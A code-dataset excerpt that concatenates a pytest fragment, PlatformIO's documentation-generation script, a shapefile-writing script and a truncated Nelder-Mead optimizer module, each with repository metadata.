for cmd_args in (["--color", "yes"], ["--color"]):
color_arg_true = PolyArgument(
api_key="color", api_value=True, cmd_args=cmd_args
)
runtest(
"search",
args=("a", AsStdinWordlist(["a", "b"]), color_arg_true),
ret=AsWordlist([red("a")]),
)
runtest(
"search",
args=(
"a",
AsStdinWordlist(["alpha", "beta", "gama", "omega"]),
color_arg_true,
),
ret=AsWordlist(
[
f"{red('a')}lpha",
f"bet{red('a')}",
f"g{red('a')}ma",
f"omeg{red('a')}",
]
),
)
runtest(
"search",
args=("bc", AsStdinWordlist(["abc", "xbc", "eff", "bxc"]), color_arg_true),
ret=AsWordlist([f"a{red('bc')}", f"x{red('bc')}"]),
)
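# Editor's note (not part of the original file): the test_* functions follow the pytest
# naming convention, so the file can presumably be run with, e.g.,
#     pytest tests/test_tools/test_search.py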
avg_line_length: 27.720588 | max_line_length: 87 | alphanum_fraction: 0.468966

hexsha: 90dc887dcea1ff2eedefbc8d6852c4d9ad9a64cb | size: 33,321 | ext: py | lang: Python
max_stars / max_issues / max_forks repo (identical for all three): path = scripts/docspregen.py | name = ufo2011/platformio-core | head_hexsha = 0ceae62701731f8b32c34d7993a34dea34aea59c | licenses = ["Apache-2.0"]
max_stars_count, max_issues_count, max_forks_count: null | all event datetimes: null

content:
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import sys
import tempfile
from urllib.parse import ParseResult, urlparse, urlunparse
sys.path.append("..")
import click # noqa: E402
from platformio import fs, util # noqa: E402
from platformio.package.manager.platform import PlatformPackageManager # noqa: E402
from platformio.platform.factory import PlatformFactory # noqa: E402
RST_COPYRIGHT = """.. Copyright (c) 2014-present PlatformIO <contact@platformio.org>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
DOCS_ROOT_DIR = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "docs")
)
REGCLIENT = PlatformPackageManager().get_registry_client_instance()
def reg_package_url(type_, owner, name):
if type_ == "library":
type_ = "libraries"
else:
type_ += "s"
return f"https://registry.platformio.org/{type_}/{owner}/{name}"
def campaign_url(url, source="platformio.org", medium="docs"):
data = urlparse(url)
query = data.query
if query:
query += "&"
query += "utm_source=%s&utm_medium=%s" % (source, medium)
return urlunparse(
ParseResult(
data.scheme, data.netloc, data.path, data.params, query, data.fragment
)
)
def install_platforms():
print("Installing platforms...")
page = 1
pm = PlatformPackageManager()
while True:
result = REGCLIENT.list_packages(qualifiers=dict(types=["platform"]), page=page)
for item in result["items"]:
spec = "%s/%s" % (item["owner"]["username"], item["name"])
skip_conds = [
item["owner"]["username"] != "platformio",
item["tier"] == "community",
]
if all(skip_conds):
click.secho("Skip community platform: %s" % spec, fg="yellow")
continue
pm.install(spec, skip_dependencies=True)
page += 1
if not result["items"] or result["page"] * result["limit"] >= result["total"]:
break
@functools.cache
def get_frameworks():
items = {}
for pkg in PlatformPackageManager().get_installed():
p = PlatformFactory.new(pkg)
for name, options in (p.frameworks or {}).items():
if name in items or not set(options.keys()).issuperset(
set(["title", "description"])
):
continue
items[name] = dict(
name=name, title=options["title"], description=options["description"]
)
return sorted(items.values(), key=lambda item: item["name"])
def is_compat_platform_and_framework(platform, framework):
p = PlatformFactory.new(platform)
return framework in (p.frameworks or {}).keys()
def generate_boards_table(boards, skip_columns=None):
columns = [
("Name", ":ref:`board_{platform}_{id}`"),
("Platform", ":ref:`platform_{platform}`"),
("Debug", "{debug}"),
("MCU", "{mcu}"),
("Frequency", "{f_cpu}MHz"),
("Flash", "{rom}"),
("RAM", "{ram}"),
]
lines = []
lines.append(
"""
.. list-table::
:header-rows: 1
"""
)
# add header
for (name, template) in columns:
if skip_columns and name in skip_columns:
continue
prefix = " * - " if name == "Name" else " - "
lines.append(prefix + name)
for data in sorted(boards, key=lambda item: item["name"]):
has_onboard_debug = data.get("debug") and any(
t.get("onboard") for (_, t) in data["debug"]["tools"].items()
)
debug = "No"
if has_onboard_debug:
debug = "On-board"
elif data.get("debug"):
debug = "External"
variables = dict(
id=data["id"],
name=data["name"],
platform=data["platform"],
debug=debug,
mcu=data["mcu"].upper(),
f_cpu=int(data["fcpu"] / 1000000.0),
ram=fs.humanize_file_size(data["ram"]),
rom=fs.humanize_file_size(data["rom"]),
)
for (name, template) in columns:
if skip_columns and name in skip_columns:
continue
prefix = " * - " if name == "Name" else " - "
lines.append(prefix + template.format(**variables))
if lines:
lines.append("")
return lines
def generate_frameworks_contents(frameworks):
if not frameworks:
return []
lines = []
lines.append(
"""
Frameworks
----------
.. list-table::
:header-rows: 1
* - Name
- Description"""
)
known = set()
for framework in get_frameworks():
known.add(framework["name"])
if framework["name"] not in frameworks:
continue
lines.append(
"""
* - :ref:`framework_{name}`
- {description}""".format(
**framework
)
)
if set(frameworks) - known:
click.secho("Unknown frameworks %s " % (set(frameworks) - known), fg="red")
return lines
def generate_platforms_contents(platforms):
if not platforms:
return []
lines = []
lines.append(
"""
Platforms
---------
.. list-table::
:header-rows: 1
* - Name
- Description"""
)
for name in sorted(platforms):
p = PlatformFactory.new(name)
lines.append(
"""
* - :ref:`platform_{name}`
- {description}""".format(
name=p.name, description=p.description
)
)
return lines
def generate_debug_contents(boards, skip_board_columns=None, extra_rst=None):
if not skip_board_columns:
skip_board_columns = []
skip_board_columns.append("Debug")
lines = []
onboard_debug = [
b
for b in boards
if b.get("debug")
and any(t.get("onboard") for (_, t) in b["debug"]["tools"].items())
]
external_debug = [b for b in boards if b.get("debug") and b not in onboard_debug]
if not onboard_debug and not external_debug:
return lines
lines.append(
"""
Debugging
---------
:ref:`piodebug` - "1-click" solution for debugging with a zero configuration.
.. contents::
:local:
"""
)
if extra_rst:
lines.append(".. include:: %s" % extra_rst)
lines.append(
"""
Tools & Debug Probes
~~~~~~~~~~~~~~~~~~~~
Supported debugging tools are listed in "Debug" column. For more detailed
information, please scroll table by horizontal.
You can switch between debugging :ref:`debugging_tools` using
:ref:`projectconf_debug_tool` option in :ref:`projectconf`.
.. warning::
You will need to install debug tool drivers depending on your system.
Please click on compatible debug tool below for the further instructions.
"""
)
if onboard_debug:
lines.append(
"""
On-Board Debug Tools
^^^^^^^^^^^^^^^^^^^^
Boards listed below have on-board debug probe and **ARE READY** for debugging!
You do not need to use/buy external debug probe.
"""
)
lines.extend(
generate_boards_table(onboard_debug, skip_columns=skip_board_columns)
)
if external_debug:
lines.append(
"""
External Debug Tools
^^^^^^^^^^^^^^^^^^^^
Boards listed below are compatible with :ref:`piodebug` but **DEPEND ON**
external debug probe. They **ARE NOT READY** for debugging.
Please click on board name for the further details.
"""
)
lines.extend(
generate_boards_table(external_debug, skip_columns=skip_board_columns)
)
return lines
def generate_packages(platform, packages, is_embedded):
if not packages:
return
lines = []
lines.append(
"""
Packages
--------
"""
)
lines.append(
""".. list-table::
:header-rows: 1
* - Name
- Description"""
)
for name, options in dict(sorted(packages.items())).items():
package = REGCLIENT.get_package(
"tool", options.get("owner", "platformio"), name
)
lines.append(
"""
* - `{name} <{url}>`__
- {description}""".format(
name=package["name"],
url=reg_package_url(
"tool", package["owner"]["username"], package["name"]
),
description=package["description"],
)
)
if is_embedded:
lines.append(
"""
.. warning::
**Linux Users**:
* Install "udev" rules :ref:`faq_udev_rules`
* Raspberry Pi users, please read this article
`Enable serial port on Raspberry Pi <https://hallard.me/enable-serial-port-on-raspberry-pi/>`__.
"""
)
if platform == "teensy":
lines.append(
"""
**Windows Users:**
Teensy programming uses only Windows built-in HID
drivers. When Teensy is programmed to act as a USB Serial device,
Windows XP, Vista, 7 and 8 require `this serial driver
<http://www.pjrc.com/teensy/serial_install.exe>`_
is needed to access the COM port your program uses. No special driver
installation is necessary on Windows 10.
"""
)
else:
lines.append(
"""
**Windows Users:**
Please check that you have a correctly installed USB driver from board
manufacturer
"""
)
return "\n".join(lines)
def generate_platform(pkg, rst_dir):
name = pkg.metadata.name
print("Processing platform: %s" % name)
compatible_boards = [
board
for board in PlatformPackageManager().get_installed_boards()
if name == board["platform"]
]
lines = []
lines.append(RST_COPYRIGHT)
p = PlatformFactory.new(name)
assert p.repository_url.endswith(".git")
github_url = p.repository_url[:-4]
registry_url = reg_package_url("platform", pkg.metadata.spec.owner, name)
lines.append(".. _platform_%s:" % p.name)
lines.append("")
lines.append(p.title)
lines.append("=" * len(p.title))
lines.append("")
lines.append(":Registry:")
lines.append(" `%s <%s>`__" % (registry_url, registry_url))
lines.append(":Configuration:")
lines.append(" :ref:`projectconf_env_platform` = ``%s``" % p.name)
lines.append("")
lines.append(p.description)
lines.append(
"""
For more detailed information please visit `vendor site <%s>`_."""
% campaign_url(p.homepage)
)
lines.append(
"""
.. contents:: Contents
:local:
:depth: 1
"""
)
#
# Extra
#
if os.path.isfile(os.path.join(rst_dir, "%s_extra.rst" % name)):
lines.append(".. include:: %s_extra.rst" % p.name)
#
# Examples
#
lines.append(
"""
Examples
--------
Examples are listed from `%s development platform repository <%s>`_:
"""
% (p.title, campaign_url("%s/tree/master/examples" % github_url))
)
examples_dir = os.path.join(p.get_dir(), "examples")
if os.path.isdir(examples_dir):
for eitem in os.listdir(examples_dir):
example_dir = os.path.join(examples_dir, eitem)
if not os.path.isdir(example_dir) or not os.listdir(example_dir):
continue
url = "%s/tree/master/examples/%s" % (github_url, eitem)
lines.append("* `%s <%s>`_" % (eitem, campaign_url(url)))
#
# Debugging
#
if compatible_boards:
lines.extend(
generate_debug_contents(
compatible_boards,
skip_board_columns=["Platform"],
extra_rst="%s_debug.rst" % name
if os.path.isfile(os.path.join(rst_dir, "%s_debug.rst" % name))
else None,
)
)
#
# Development version of dev/platform
#
lines.append(
"""
Stable and upstream versions
----------------------------
You can switch between `stable releases <{github_url}/releases>`__
of {title} development platform and the latest upstream version using
:ref:`projectconf_env_platform` option in :ref:`projectconf` as described below.
Stable
~~~~~~
.. code-block:: ini
; Latest stable version
[env:latest_stable]
platform = {name}
board = ...
; Custom stable version
[env:custom_stable]
platform = {name}@x.y.z
board = ...
Upstream
~~~~~~~~
.. code-block:: ini
[env:upstream_develop]
platform = {github_url}.git
board = ...
""".format(
name=p.name, title=p.title, github_url=github_url
)
)
#
# Packages
#
_packages_content = generate_packages(name, p.packages, p.is_embedded())
if _packages_content:
lines.append(_packages_content)
#
# Frameworks
#
compatible_frameworks = []
for framework in get_frameworks():
if is_compat_platform_and_framework(name, framework["name"]):
compatible_frameworks.append(framework["name"])
lines.extend(generate_frameworks_contents(compatible_frameworks))
#
# Boards
#
if compatible_boards:
vendors = {}
for board in compatible_boards:
if board["vendor"] not in vendors:
vendors[board["vendor"]] = []
vendors[board["vendor"]].append(board)
lines.append(
"""
Boards
------
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll the tables below by
horizontally.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards, skip_columns=["Platform"]))
return "\n".join(lines)
def update_platform_docs():
platforms_dir = os.path.join(DOCS_ROOT_DIR, "platforms")
for pkg in PlatformPackageManager().get_installed():
rst_path = os.path.join(platforms_dir, "%s.rst" % pkg.metadata.name)
with open(rst_path, "w") as f:
f.write(generate_platform(pkg, platforms_dir))
def generate_framework(type_, framework, rst_dir=None):
print("Processing framework: %s" % type_)
compatible_platforms = [
pkg
for pkg in PlatformPackageManager().get_installed()
if is_compat_platform_and_framework(pkg.metadata.name, type_)
]
compatible_boards = [
board
for board in PlatformPackageManager().get_installed_boards()
if type_ in board["frameworks"]
]
lines = []
lines.append(RST_COPYRIGHT)
lines.append(".. _framework_%s:" % type_)
lines.append("")
lines.append(framework["title"])
lines.append("=" * len(framework["title"]))
lines.append("")
lines.append(":Configuration:")
lines.append(" :ref:`projectconf_env_framework` = ``%s``" % type_)
lines.append("")
lines.append(framework["description"])
lines.append(
"""
.. contents:: Contents
:local:
:depth: 1"""
)
# Extra
if os.path.isfile(os.path.join(rst_dir, "%s_extra.rst" % type_)):
lines.append(".. include:: %s_extra.rst" % type_)
if compatible_platforms:
# Platforms
lines.extend(
generate_platforms_contents(
[pkg.metadata.name for pkg in compatible_platforms]
)
)
# examples
lines.append(
"""
Examples
--------
"""
)
for pkg in compatible_platforms:
p = PlatformFactory.new(pkg)
lines.append(
"* `%s for %s <%s>`_"
% (
framework["title"],
p.title,
campaign_url("%s/tree/master/examples" % p.repository_url[:-4]),
)
)
#
# Debugging
#
if compatible_boards:
lines.extend(
generate_debug_contents(
compatible_boards,
extra_rst="%s_debug.rst" % type_
if os.path.isfile(os.path.join(rst_dir, "%s_debug.rst" % type_))
else None,
)
)
#
# Boards
#
if compatible_boards:
vendors = {}
for board in compatible_boards:
if board["vendor"] not in vendors:
vendors[board["vendor"]] = []
vendors[board["vendor"]].append(board)
lines.append(
"""
Boards
------
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll the tables below by horizontally.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards))
return "\n".join(lines)
def update_framework_docs():
frameworks_dir = os.path.join(DOCS_ROOT_DIR, "frameworks")
for framework in get_frameworks():
name = framework["name"]
rst_path = os.path.join(frameworks_dir, "%s.rst" % name)
with open(rst_path, "w") as f:
f.write(generate_framework(name, framework, frameworks_dir))
def update_boards():
print("Updating boards...")
lines = []
lines.append(RST_COPYRIGHT)
lines.append(".. _boards:")
lines.append("")
lines.append("Boards")
lines.append("======")
lines.append(
"""
Rapid Embedded Development, Continuous and IDE integration in a few
steps with PlatformIO thanks to built-in project generator for the most
popular embedded boards and IDEs.
.. note::
* You can list pre-configured boards by :ref:`cmd_boards` command
* For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
platforms = {}
installed_boards = PlatformPackageManager().get_installed_boards()
for data in installed_boards:
platform = data["platform"]
if platform in platforms:
platforms[platform].append(data)
else:
platforms[platform] = [data]
for platform, boards in sorted(platforms.items()):
p = PlatformFactory.new(platform)
lines.append(p.title)
lines.append("-" * len(p.title))
lines.append(
"""
.. toctree::
:maxdepth: 1
"""
)
for board in sorted(boards, key=lambda item: item["name"]):
lines.append(" %s/%s" % (platform, board["id"]))
lines.append("")
emboards_rst = os.path.join(DOCS_ROOT_DIR, "boards", "index.rst")
with open(emboards_rst, "w") as f:
f.write("\n".join(lines))
# individual board page
for data in installed_boards:
rst_path = os.path.join(
DOCS_ROOT_DIR, "boards", data["platform"], "%s.rst" % data["id"]
)
if not os.path.isdir(os.path.dirname(rst_path)):
os.makedirs(os.path.dirname(rst_path))
update_embedded_board(rst_path, data)
def update_embedded_board(rst_path, board):
platform = PlatformFactory.new(board["platform"])
board_config = platform.board_config(board["id"])
board_manifest_url = platform.repository_url
assert board_manifest_url
if board_manifest_url.endswith(".git"):
board_manifest_url = board_manifest_url[:-4]
board_manifest_url += "/blob/master/boards/%s.json" % board["id"]
variables = dict(
id=board["id"],
name=board["name"],
platform=board["platform"],
platform_description=platform.description,
url=campaign_url(board["url"]),
mcu=board_config.get("build", {}).get("mcu", ""),
mcu_upper=board["mcu"].upper(),
f_cpu=board["fcpu"],
f_cpu_mhz=int(int(board["fcpu"]) / 1000000),
ram=fs.humanize_file_size(board["ram"]),
rom=fs.humanize_file_size(board["rom"]),
vendor=board["vendor"],
board_manifest_url=board_manifest_url,
upload_protocol=board_config.get("upload.protocol", ""),
)
lines = [RST_COPYRIGHT]
lines.append(".. _board_{platform}_{id}:".format(**variables))
lines.append("")
lines.append(board["name"])
lines.append("=" * len(board["name"]))
lines.append(
"""
.. contents::
Hardware
--------
Platform :ref:`platform_{platform}`: {platform_description}
.. list-table::
* - **Microcontroller**
- {mcu_upper}
* - **Frequency**
- {f_cpu_mhz:d}MHz
* - **Flash**
- {rom}
* - **RAM**
- {ram}
* - **Vendor**
- `{vendor} <{url}>`__
""".format(
**variables
)
)
#
# Configuration
#
lines.append(
"""
Configuration
-------------
Please use ``{id}`` ID for :ref:`projectconf_env_board` option in :ref:`projectconf`:
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
You can override default {name} settings per build environment using
``board_***`` option, where ``***`` is a JSON object path from
board manifest `{id}.json <{board_manifest_url}>`_. For example,
``board_build.mcu``, ``board_build.f_cpu``, etc.
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
; change microcontroller
board_build.mcu = {mcu}
; change MCU frequency
board_build.f_cpu = {f_cpu}L
""".format(
**variables
)
)
#
# Uploading
#
upload_protocols = board_config.get("upload.protocols", [])
if len(upload_protocols) > 1:
lines.append(
"""
Uploading
---------
%s supports the following uploading protocols:
"""
% board["name"]
)
for protocol in sorted(upload_protocols):
lines.append("* ``%s``" % protocol)
lines.append(
"""
Default protocol is ``%s``"""
% variables["upload_protocol"]
)
lines.append(
"""
You can change upload protocol using :ref:`projectconf_upload_protocol` option:
.. code-block:: ini
[env:{id}]
platform = {platform}
board = {id}
upload_protocol = {upload_protocol}
""".format(
**variables
)
)
#
# Debugging
#
lines.append("Debugging")
lines.append("---------")
if not board.get("debug"):
lines.append(
":ref:`piodebug` currently does not support {name} board.".format(
**variables
)
)
else:
default_debug_tool = board_config.get_debug_tool_name()
has_onboard_debug = any(
t.get("onboard") for (_, t) in board["debug"]["tools"].items()
)
lines.append(
"""
:ref:`piodebug` - "1-click" solution for debugging with a zero configuration.
.. warning::
You will need to install debug tool drivers depending on your system.
Please click on compatible debug tool below for the further
instructions and configuration information.
You can switch between debugging :ref:`debugging_tools` using
:ref:`projectconf_debug_tool` option in :ref:`projectconf`.
"""
)
if has_onboard_debug:
lines.append(
"{name} has on-board debug probe and **IS READY** for "
"debugging. You don't need to use/buy external debug probe.".format(
**variables
)
)
else:
lines.append(
"{name} does not have on-board debug probe and **IS NOT "
"READY** for debugging. You will need to use/buy one of "
"external probe listed below.".format(**variables)
)
lines.append(
"""
.. list-table::
:header-rows: 1
* - Compatible Tools
- On-board
- Default"""
)
for (tool_name, tool_data) in sorted(board["debug"]["tools"].items()):
lines.append(
""" * - :ref:`debugging_tool_{name}`
- {onboard}
- {default}""".format(
name=tool_name,
onboard="Yes" if tool_data.get("onboard") else "",
default="Yes" if tool_name == default_debug_tool else "",
)
)
if board["frameworks"]:
lines.extend(generate_frameworks_contents(board["frameworks"]))
with open(rst_path, "w") as f:
f.write("\n".join(lines))
def update_debugging():
tool_to_platforms = {}
tool_to_boards = {}
vendors = {}
platforms = []
frameworks = []
for data in PlatformPackageManager().get_installed_boards():
if not data.get("debug"):
continue
for tool in data["debug"]["tools"]:
tool = str(tool)
if tool not in tool_to_platforms:
tool_to_platforms[tool] = []
tool_to_platforms[tool].append(data["platform"])
if tool not in tool_to_boards:
tool_to_boards[tool] = []
tool_to_boards[tool].append(data["id"])
platforms.append(data["platform"])
frameworks.extend(data["frameworks"])
vendor = data["vendor"]
if vendor in vendors:
vendors[vendor].append(data)
else:
vendors[vendor] = [data]
platforms = sorted(set(platforms))
frameworks = sorted(set(frameworks))
lines = [".. _debugging_platforms:"]
lines.extend(generate_platforms_contents(platforms))
lines.extend(generate_frameworks_contents(frameworks))
# Boards
lines.append(
"""
Boards
------
.. note::
For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
for vendor, boards in sorted(vendors.items()):
lines.append(str(vendor))
lines.append("~" * len(vendor))
lines.extend(generate_boards_table(boards))
# save
with open(
os.path.join(fs.get_source_dir(), "..", "docs", "plus", "debugging.rst"), "r+"
) as fp:
content = fp.read()
fp.seek(0)
fp.truncate()
fp.write(
content[: content.index(".. _debugging_platforms:")] + "\n".join(lines)
)
# Debug tools
for tool, platforms in tool_to_platforms.items():
tool_path = os.path.join(DOCS_ROOT_DIR, "plus", "debug-tools", "%s.rst" % tool)
if not os.path.isfile(tool_path):
click.secho("Unknown debug tool `%s`" % tool, fg="red")
continue
platforms = sorted(set(platforms))
lines = [".. begin_platforms"]
lines.extend(generate_platforms_contents(platforms))
tool_frameworks = []
for platform in platforms:
for framework in frameworks:
if is_compat_platform_and_framework(platform, framework):
tool_frameworks.append(framework)
lines.extend(generate_frameworks_contents(tool_frameworks))
lines.append(
"""
Boards
------
.. note::
For more detailed ``board`` information please scroll tables below by horizontal.
"""
)
lines.extend(
generate_boards_table(
[
b
for b in PlatformPackageManager().get_installed_boards()
if b["id"] in tool_to_boards[tool]
],
skip_columns=None,
)
)
with open(tool_path, "r+") as fp:
content = fp.read()
fp.seek(0)
fp.truncate()
fp.write(content[: content.index(".. begin_platforms")] + "\n".join(lines))
def update_project_examples():
platform_readme_tpl = """
# {title}: development platform for [PlatformIO](https://platformio.org)
{description}
* [Home](https://platformio.org/platforms/{name}) (home page in PlatformIO Registry)
* [Documentation](https://docs.platformio.org/page/platforms/{name}.html) (advanced usage, packages, boards, frameworks, etc.)
# Examples
{examples}
"""
framework_readme_tpl = """
# {title}: framework for [PlatformIO](https://platformio.org)
{description}
* [Home](https://platformio.org/frameworks/{name}) (home page in PlatformIO Registry)
* [Documentation](https://docs.platformio.org/page/frameworks/{name}.html)
# Examples
{examples}
"""
project_examples_dir = os.path.join(fs.get_source_dir(), "..", "examples")
framework_examples_md_lines = {}
embedded = []
desktop = []
for pkg in PlatformPackageManager().get_installed():
p = PlatformFactory.new(pkg)
github_url = p.repository_url[:-4]
# Platform README
platform_examples_dir = os.path.join(p.get_dir(), "examples")
examples_md_lines = []
if os.path.isdir(platform_examples_dir):
for item in sorted(os.listdir(platform_examples_dir)):
example_dir = os.path.join(platform_examples_dir, item)
if not os.path.isdir(example_dir) or not os.listdir(example_dir):
continue
url = "%s/tree/master/examples/%s" % (github_url, item)
examples_md_lines.append("* [%s](%s)" % (item, url))
readme_dir = os.path.join(project_examples_dir, "platforms", p.name)
if not os.path.isdir(readme_dir):
os.makedirs(readme_dir)
with open(os.path.join(readme_dir, "README.md"), "w") as fp:
fp.write(
platform_readme_tpl.format(
name=p.name,
title=p.title,
description=p.description,
examples="\n".join(examples_md_lines),
)
)
# Framework README
for framework in get_frameworks():
if not is_compat_platform_and_framework(p.name, framework["name"]):
continue
if framework["name"] not in framework_examples_md_lines:
framework_examples_md_lines[framework["name"]] = []
lines = []
lines.append("- [%s](%s)" % (p.title, github_url))
lines.extend(" %s" % line for line in examples_md_lines)
lines.append("")
framework_examples_md_lines[framework["name"]].extend(lines)
# Root README
line = "* [%s](%s)" % (p.title, "%s/tree/master/examples" % github_url)
if p.is_embedded():
embedded.append(line)
else:
desktop.append(line)
# Frameworks
frameworks = []
for framework in get_frameworks():
if framework["name"] not in framework_examples_md_lines:
continue
readme_dir = os.path.join(project_examples_dir, "frameworks", framework["name"])
if not os.path.isdir(readme_dir):
os.makedirs(readme_dir)
with open(os.path.join(readme_dir, "README.md"), "w") as fp:
fp.write(
framework_readme_tpl.format(
name=framework["name"],
title=framework["title"],
description=framework["description"],
examples="\n".join(framework_examples_md_lines[framework["name"]]),
)
)
url = campaign_url(
"https://docs.platformio.org/en/latest/frameworks/%s.html#examples"
% framework["name"],
source="github",
medium="examples",
)
frameworks.append("* [%s](%s)" % (framework["title"], url))
with open(os.path.join(project_examples_dir, "README.md"), "w") as fp:
fp.write(
"""# PlatformIO Project Examples
- [Development platforms](#development-platforms):
- [Embedded](#embedded)
- [Desktop](#desktop)
- [Frameworks](#frameworks)
## Development platforms
### Embedded
%s
### Desktop
%s
## Frameworks
%s
"""
% ("\n".join(embedded), "\n".join(desktop), "\n".join(frameworks))
)
def main():
with tempfile.TemporaryDirectory() as tmp_dir:
print("Core directory: %s" % tmp_dir)
os.environ["PLATFORMIO_CORE_DIR"] = tmp_dir
install_platforms()
update_platform_docs()
update_framework_docs()
update_boards()
update_debugging()
update_project_examples()
if __name__ == "__main__":
sys.exit(main())
| 28.455167
| 126
| 0.581855
|
2ca10ad6bb6480220070f6667f39518fd6e94a5b
| 533
|
py
|
Python
|
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
workspace_william/data_dowloads/CreateShapefile.py
|
william-r-austin/district2
|
fa2f5a6560159478b15cd69a97959e91a81c1490
|
[
"Unlicense"
] | null | null | null |
# Polsby Popper
import shapefile
#import shapely
from shapely import geometry
import math
f = open("voronoi_polygons.txt")
allLines = f.readlines()
i = 1
w = shapefile.Writer("MyGeneratedShapefiles/test_2")
w.field('TFIELD', 'C')
for currentLine in allLines:
points = currentLine.split()
mainPoly = []
for point in points:
vertexStrList = point.split(",")
        vertexList = [float(vertexStrList[j]) for j in range(2)]
mainPoly.append(vertexList)
w.poly([mainPoly])
w.record(TFIELD=str(i))
i += 1
f.close()
w.close()
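# The "Polsby Popper" comment at the top of this file names a compactness
# score, and the otherwise-unused shapely/math imports suggest it was planned
# here. A minimal, hypothetical sketch of that score (4*pi*area / perimeter^2)
# for a ring of vertices, using only the imports already present:
def polsby_popper(coords):
    poly = geometry.Polygon(coords)
    return 4 * math.pi * poly.area / (poly.length ** 2)
# Example: a unit square scores 4*pi/16 ~= 0.785, a circle would score 1.0.
# print(polsby_popper([(0, 0), (1, 0), (1, 1), (0, 1)]))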
| 17.193548
| 58
| 0.707317
|
f30c1b3ffb93028da3c23c02eed170e36ef24bc0
| 6,363
|
py
|
Python
|
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
naima/extern/minimize.py
|
Carlor87/naima
|
1728b0ac18fab9e709816c868625e5ffbaab83b7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module includes a copy of the scipy.optimize._minimize_neldermead
# function modified to use relative tolerances instead of absolute. See issue at
# https://github.com/scipy/scipy/issues/5051
# minimize is a thin wrapper that behaves like scipy.optimize.minimize
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import numpy
from numpy import (
atleast_1d,
eye,
mgrid,
argmin,
zeros,
shape,
squeeze,
vectorize,
asarray,
sqrt,
Inf,
asfarray,
isinf,
)
# standard status messages of optimizers
_status_message = {
"success": "Optimization terminated successfully.",
"maxfev": "Maximum number of function evaluations has " "been exceeded.",
"maxiter": "Maximum number of iterations has been " "exceeded.",
"pr_loss": "Desired error not necessarily achieved due "
"to precision loss.",
}
def wrap_function(function, args):
ncalls = [0]
if function is None:
return ncalls, None
def function_wrapper(*wrapper_args):
ncalls[0] += 1
return function(*(wrapper_args + args))
return ncalls, function_wrapper
class OptimizeResult(dict):
""" Represents the optimization result.
"""
pass
class OptimizeWarning(UserWarning):
pass
def minimize(func, x0, args=(), options={}, method=None):
return _minimize_neldermead(func, x0, args=args, **options)
def _minimize_neldermead(
func,
x0,
args=(),
callback=None,
xtol=1e-4,
ftol=1e-4,
maxiter=None,
maxfev=None,
disp=False,
return_all=False,
): # pragma: no cover
"""
Minimization of scalar function of one or more variables using the
Nelder-Mead algorithm.
Options for the Nelder-Mead algorithm are:
disp : bool
Set to True to print convergence messages.
xtol : float
Relative error in solution `xopt` acceptable for convergence.
ftol : float
Relative error in ``fun(xopt)`` acceptable for convergence.
maxiter : int
Maximum number of iterations to perform.
maxfev : int
Maximum number of function evaluations to make.
"""
maxfun = maxfev
retall = return_all
fcalls, func = wrap_function(func, args)
x0 = asfarray(x0).flatten()
N = len(x0)
rank = len(x0.shape)
if not -1 < rank < 2:
raise ValueError("Initial guess must be a scalar or rank-1 sequence.")
if maxiter is None:
maxiter = N * 200
if maxfun is None:
maxfun = N * 200
rho = 1
chi = 2
psi = 0.5
sigma = 0.5
one2np1 = list(range(1, N + 1))
if rank == 0:
sim = numpy.zeros((N + 1,), dtype=x0.dtype)
else:
sim = numpy.zeros((N + 1, N), dtype=x0.dtype)
fsim = numpy.zeros((N + 1,), float)
sim[0] = x0
if retall:
allvecs = [sim[0]]
fsim[0] = func(x0)
nonzdelt = 0.05
zdelt = 0.00025
for k in range(0, N):
y = numpy.array(x0, copy=True)
if y[k] != 0:
y[k] = (1 + nonzdelt) * y[k]
else:
y[k] = zdelt
sim[k + 1] = y
f = func(y)
fsim[k + 1] = f
ind = numpy.argsort(fsim)
fsim = numpy.take(fsim, ind, 0)
# sort so sim[0,:] has the lowest function value
sim = numpy.take(sim, ind, 0)
iterations = 1
while fcalls[0] < maxfun and iterations < maxiter:
if (
numpy.max(numpy.ravel(numpy.abs((sim[1:] - sim[0]) / sim[0])))
<= xtol
and numpy.max(numpy.abs((fsim[0] - fsim[1:]) / fsim[0])) <= ftol
):
break
xbar = numpy.add.reduce(sim[:-1], 0) / N
xr = (1 + rho) * xbar - rho * sim[-1]
fxr = func(xr)
doshrink = 0
if fxr < fsim[0]:
